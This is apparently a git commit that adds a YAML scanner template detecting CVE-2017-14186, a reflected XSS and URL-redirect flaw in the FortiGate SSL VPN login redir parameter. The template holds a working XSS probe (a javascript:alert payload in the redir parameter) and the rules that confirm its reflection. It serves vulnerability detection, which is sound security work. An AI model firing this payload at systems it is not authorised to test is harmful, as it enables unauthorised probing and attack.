Add files via upload

2022-09-21 10:42:02 -03:00 · 2022-09-21 10:42:02 -03:00 · 78331b4466
parent 6b65ced290
commit 78331b4466
1 changed files with 37 additions and 0 deletions
--- a/cves/2017/CVE-2017-14186.yml
+++ b/cves/2017/CVE-2017-14186.yml
@ -0,0 +1,37 @@
+id: CVE-2017-14186
+
+info:
+  name: FortiGate SSL VPN web portal login redir XSS vulnerability
+  author: johnk3r
+  severity: medium
+  description: Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
+  reference:
+    - https://www.fortiguard.com/psirt/FG-IR-17-242
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2017-14186
+    cwe-id: CWE-79
+  tags: cve,cve2017,fortigate,xss,fortinet
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/remote/loginredir?redir=javascript:alert('{{randstr}}')"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{randstr}}'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"